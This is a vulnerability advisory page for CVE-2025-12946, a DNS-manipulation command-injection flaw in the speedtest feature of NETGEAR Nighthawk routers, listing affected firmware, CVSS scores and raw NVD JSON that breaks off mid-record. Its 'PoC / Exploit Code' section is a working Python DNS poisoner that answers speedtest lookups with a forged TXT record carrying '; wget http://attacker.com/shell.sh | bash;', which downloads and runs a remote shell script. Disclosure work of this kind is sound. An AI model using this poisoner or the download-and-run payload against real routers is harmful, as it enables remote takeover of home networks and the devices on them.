Security Vulnerability Report
CVE-2025-12946 CVSS 7.5 HIGH

Published: 2025-12-09 17:15:49
Last Modified: 2026-01-21 19:29:14
Source: a2826606-91e7-4eb6-899e-8484bd4575d5

Description

A vulnerability in the speedtest feature of affected NETGEAR Nighthawk routers, caused by improper input validation, can allow attackers on the router's WAN side, using attacker-in-the-middle (MiTM) techniques, to manipulate DNS responses and execute commands when speedtests are run.

This issue affects RS700: through 1.0.7.82; RAX54Sv2: before V1.1.6.36; RAX41v2: before V1.1.6.36; RAX50: before V1.2.14.114; RAXE500: before V1.2.14.114; RAX41: before V1.0.17.142; RAX43: before V1.0.17.142; RAX35v2: before V1.0.17.142; RAXE450: before V1.2.14.114; RAX43v2: before V1.1.6.36; RAX42: before V1.0.17.142; RAX45: before V1.0.17.142; RAX50v2: before V1.1.6.36; MR90: before V1.0.2.46; MS90: before V1.0.2.46; RAX42v2: before V1.1.6.36; RAX49S: before V1.1.6.36.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:netgear:rs700_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rs700:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:netgear:rax54sv2_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rax54sv2:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:netgear:rax45v2_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rax45v2:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:netgear:rax41v2_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rax41v2:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:netgear:rax50_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rax50:-:*:*:*:*:*:*:* - NOT VULNERABLE
NETGEAR RS700 < 1.0.7.82
NETGEAR RAX54Sv2 < V1.1.6.36
NETGEAR RAX41v2 < V1.1.6.36
NETGEAR RAX50 < V1.2.14.114
NETGEAR RAXE500 < V1.2.14.114
NETGEAR RAX41 < V1.0.17.142
NETGEAR RAX43 < V1.0.17.142
NETGEAR RAX35v2 < V1.0.17.142
NETGEAR RAXE450 < V1.2.14.114
NETGEAR RAX43v2 < V1.1.6.36
NETGEAR RAX42 < V1.0.17.142
NETGEAR RAX45 < V1.0.17.142
NETGEAR RAX50v2 < V1.1.6.36
NETGEAR MR90 < V1.0.2.46
NETGEAR MS90 < V1.0.2.46
NETGEAR RAX42v2 < V1.1.6.36
NETGEAR RAX49S < V1.1.6.36

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-12946 PoC - NETGEAR Router Speedtest DNS Manipulation
# This PoC demonstrates the DNS poisoning technique for speedtest command injection
import struct
import socket
import threading


class DNSPoisoner:
    def __init__(self, target_domain, injected_command):
        self.target_domain = target_domain
        self.injected_command = injected_command
        self.attacker_ip = "192.168.1.100"  # Attacker controlled IP

    def craft_poisoned_response(self, query_data):
        """Craft DNS response with injected command in TXT record"""
        # DNS header: ID, flags, counts
        response = query_data[:2]  # Transaction ID
        response += b'\x81\x80'  # Flags: Standard response, no error
        response += query_data[4:6] + query_data[4:6]  # Question count
        response += b'\x00\x00\x00\x00'  # Answer, Authority, Additional counts
        # Original question section
        response += query_data[12:]
        # Answer section with malicious TXT record
        response += b'\xc0\x0c'  # Pointer to question name
        response += b'\x00\x10'  # Type: TXT
        response += b'\x00\x01'  # Class: IN
        response += b'\x00\x00\x00\x3c'  # TTL: 60 seconds
        # TXT record with injected command
        cmd_length = len(self.injected_command)
        response += struct.pack('>B', cmd_length)
        response += self.injected_command.encode()
        return response

    def start(self, port=53):
        """Start DNS poisoning server"""
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind(('0.0.0.0', port))
        print(f"[*] DNS Poisoner listening on port {port}")
        print(f"[*] Target domain: {self.target_domain}")
        print(f"[*] Injected command: {self.injected_command}")
        while True:
            try:
                data, addr = sock.recvfrom(512)
                if self.target_domain.encode() in data:
                    print(f"[+] Intercepted DNS query for {self.target_domain}")
                    poisoned_response = self.craft_poisoned_response(data)
                    sock.sendto(poisoned_response, addr)
                    print("[+] Sent poisoned DNS response")
            except Exception as e:
                print(f"[-] Error: {e}")


if __name__ == "__main__":
    # Configuration - customize based on target
    TARGET_DOMAIN = "speedtest.netgear.com"
    INJECTED_CMD = "; wget http://attacker.com/shell.sh | bash;"
    poisoner = DNSPoisoner(TARGET_DOMAIN, INJECTED_CMD)
    poisoner.start()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12946", "sourceIdentifier": "a2826606-91e7-4eb6-899e-8484bd4575d5", "published": "2025-12-09T17:15:48.820", "lastModified": "2026-01-21T19:29:14.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the speedtest feature of affected NETGEAR Nighthawk routers, caused by improper input validation, can allow attackers on the router's WAN side, using attacker-in-the-middle techniques (MiTM) to manipulate DNS responses and execute commands when speedtests are run. \n\n\n\nThis issue affects RS700: through 1.0.7.82; RAX54Sv2 : before V1.1.6.36; RAX41v2: before V1.1.6.36; RAX50: before V1.2.14.114; RAXE500: before V1.2.14.114; RAX41: before V1.0.17.142; RAX43: before V1.0.17.142; RAX35v2: before V1.0.17.142; RAXE450: before V1.2.14.114; RAX43v2: before V1.1.6.36; RAX42: before V1.0.17.142; RAX45: before V1.0.17.142; RAX50v2: before V1.1.6.36; MR90: before V1.0.2.46; MS90: before V1.0.2.46; RAX42v2: before V1.1.6.36; RAX49S: before V1.1.6.36."}], "metrics": {"cvssMetricV40": [{"source": "a2826606-91e7-4eb6-899e-8484bd4575d5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:A/V:D/RE:M/U:Amber", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "NO", "Recovery": "AUTOMATIC", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "a2826606-91e7-4eb6-899e-8484bd4575d5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rs700_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.9.6", "matchCriteriaId": "C3AE8FD9-1FC9-4DF0-B22B-B482980EEDA8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rs700:-:*:*:*:*:*:*:*", "matchCriteriaId": "20BFC36A-1819-4878-A004-9851290B203F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rax54sv2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": 
"1.1.6.36", "matchCriteriaId": "83DB8165-F9DC-4086-91AF-9C4298FECBCC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rax54sv2:-:*:*:*:*:*:*:*", "matchCriteriaId": "B9FCC230-8A49-4C8C-BB53-DD703996F4DA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rax45v2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.6.36", "matchCriteriaId": "5F6C69CA-30D0-4753-915B-9E5A15F10E2A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rax45v2:-:*:*:*:*:*:*:*", "matchCriteriaId": "AD5E8B48-66CB-4D9B-89C3-DA5F1A7B74F3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rax41v2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.6.36", "matchCriteriaId": "BEC93BCF-E89C-49A9-9631-1666E6FF4E21"}]}, {"operator": "OR", "negate": fa ... (truncated)